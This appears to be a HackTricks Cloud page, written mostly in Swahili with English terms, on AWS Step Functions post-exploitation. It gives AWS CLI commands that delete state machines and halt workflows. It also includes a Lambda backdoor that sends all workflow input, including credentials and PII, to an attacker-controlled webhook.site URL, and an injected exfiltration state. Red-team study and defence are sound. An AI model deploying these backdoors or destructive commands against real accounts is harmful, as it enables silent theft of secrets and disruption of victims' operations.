HackTricks CloudAWS - Step Functions Post Exploitation
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Step Functions
Kwa maelezo zaidi kuhusu huduma hii ya AWS, angalia:
states:RevealSecrets
Ruhusa hii inaruhusu reveal secret data inside an execution. Ili kufanya hivyo, inahitajika kuweka Inspection level kuwa TRACE na parameta revealSecrets kuwa true.
.png)
states:DeleteStateMachine, states:DeleteStateMachineVersion, states:DeleteStateMachineAlias
An attacker mwenye ruhusa hizi angeweza kufuta kabisa state machines, versions zao, na aliases. Hii inaweza kuvuruga workflows muhimu, kusababisha upotevu wa data, na kuhitaji muda mkubwa kurejesha na kupona state machines zilizoathiriwa. Zaidi ya hayo, itamruhusu attacker kufunika alama za shughuli zilizotumiwa, kuvuruga uchunguzi wa forensiki, na uwezekano kuharibu operesheni kwa kuondoa michakato muhimu ya automation na konfigurishaji za state.
note
- Kufuta state machine pia unafuta versions zote zinazohusiana na aliases zake.
- Kufuta state machine alias hakufuti state machine versions zinazorejelea alias hii.
- Haiwezekani kufuta state machine version ambayo kwa sasa inarejelewa na alias moja au zaidi.
# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
# Delete state machine version
aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
- Athari Zinazowezekana: Kuingiliwa kwa workflows muhimu, upotezaji wa data, na kusimamishwa kwa shughuli za uendeshaji.
states:UpdateMapRun
Mdukuzi mwenye ruhusa hii ataweza kubadilisha Map Run failure configuration na mipangilio ya parallel, akiwa na uwezo wa kuongeza au kupunguza kiwango cha juu cha utekelezaji wa child workflow zinazoruhusiwa, jambo linaloathiri moja kwa moja utendaji wa huduma. Zaidi ya hayo, mdukuzi anaweza kuingilia asilimia ya makosa iliyokubaliwa na idadi yake (tolerated failure percentage and count), akipunguza thamani hii hadi 0 ili kila wakati kipengee kinapofeli, Map Run nzima itafeli, ikiaathiri moja kwa moja state machine execution na kugandisha workflows muhimu.
aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
- Athari Inayowezekana: Kupungua kwa utendaji, na kuingiliwa kwa mitiririko muhimu ya kazi.
states:StopExecution
Mdukuzi mwenye ruhusa hii anaweza kusimamisha utekelezaji wa mashine yoyote ya hali, akivuruga mitiririko na michakato inayofanyika. Hii inaweza kusababisha miamala isiyokamilika, kusimamishwa kwa shughuli za biashara, na uwezekano wa uharibifu wa data.
warning
Kitendo hiki hakitegemezwi na express state machines.
aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
- Athari Inayoweza Kutokea: Kuvuruga mchakato wa kazi unaoendelea, kusimamishwa kwa operesheni, na uwezekano wa uharibifu wa data.
states:TagResource, states:UntagResource
Mshambuliaji anaweza kuongeza, kubadilisha, au kuondoa tags kutoka kwa rasilimali za Step Functions, akivuruga ugawaji wa gharama wa shirika lako, ufuatiliaji wa rasilimali, na sera za udhibiti wa upatikanaji zinazotegemea tags.
aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
Athari Inayoweza Kutokea: Kuvuruga ugawaji wa gharama, ufuatilaji wa rasilimali, na tag-based access control policies.
states:UpdateStateMachine, lambda:UpdateFunctionCode
Mshambuliaji anayepata udhibiti wa mtumiaji au cheo lenye ruhusa zifuatazo:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUpdateStateMachine",
"Effect": "Allow",
"Action": "states:UpdateStateMachine",
"Resource": "*"
},
{
"Sid": "AllowUpdateFunctionCode",
"Effect": "Allow",
"Action": "lambda:UpdateFunctionCode",
"Resource": "*"
}
]
}
...anaweza kufanya high-impact and stealthy post-exploitation attack kwa kuchanganya Lambda backdooring na Step Function logic manipulation.
Senario hii inadhani kuwa mwathiriwa anatumia AWS Step Functions kuratibu workflows zinazoshughulikia input nyeti, kama vile credentials, tokens, au PII.
Mfano wa invocation ya mwathiriwa:
aws stepfunctions start-execution \
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
Ikiwa Step Function imewekwa kuitisha Lambda kama LegitBusinessLogic, attacker anaweza kuendelea na aina mbili za attack za kificho:
Kusasisha Lambda function
attacker anabadilisha msimbo wa Lambda function inayotumika tayari na Step Function (LegitBusinessLogic) ili kwa siri exfiltrate data za ingizo.
# send_to_attacker.py
import requests
def lambda_handler(event, context):
requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
return {"status": "exfiltrated"}
zip function.zip send_to_attacker.py
aws lambda update-function-code \
--function-name LegitBusinessLogic \
--zip-file fileb://function.zip -profile attacker
Ongeza Malicious State kwenye Step Function
Badala yake, attacker anaweza kuingiza exfiltration state mwanzoni mwa workflow kwa kusasisha ufafanuzi wa Step Function.
{
"Comment": "Backdoored for Exfiltration",
"StartAt": "OriginalState",
"States": {
"OriginalState": {
"Type": "Task",
"Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
"End": true
}
}
}
aws stepfunctions update-state-machine \
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
--definition file://malicious_state_definition.json --profile attacker
Mshambuliaji anaweza hata kwa ustadi zaidi kusasisha state definition kuwa kitu kama hiki { "Comment": "Backdoored for Exfiltration", "StartAt": "ExfiltrateSecrets", "States": { "ExfiltrateSecrets": { "Type": "Task", "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker", "InputPath": "$", "ResultPath": "$.exfil", "Next": "OriginalState" }, "OriginalState": { "Type": "Task", "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic", "End": true } } } ambapo mwathirika hatagundua tofauti
Mipangilio ya Mwathirika (Context for Exploit)
- Step Function (
LegitStateMachine) inatumika kuchakata input nyeti za mtumiaji. - Inaita Lambda functions moja au zaidi kama
LegitBusinessLogic.
Athari Inayowezekana:
- Utoroshaji kimya wa data nyeti ikijumuisha secrets, credentials, API keys, na PII.
- Hakuna makosa au kushindwa kwaonekana katika utekelezaji wa workflow.
- Gumu kugundua bila kukagua code za Lambda au execution traces.
- Inawezesha persistence ya muda mrefu ikiwa backdoor inabaki katika code au ASL logic.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.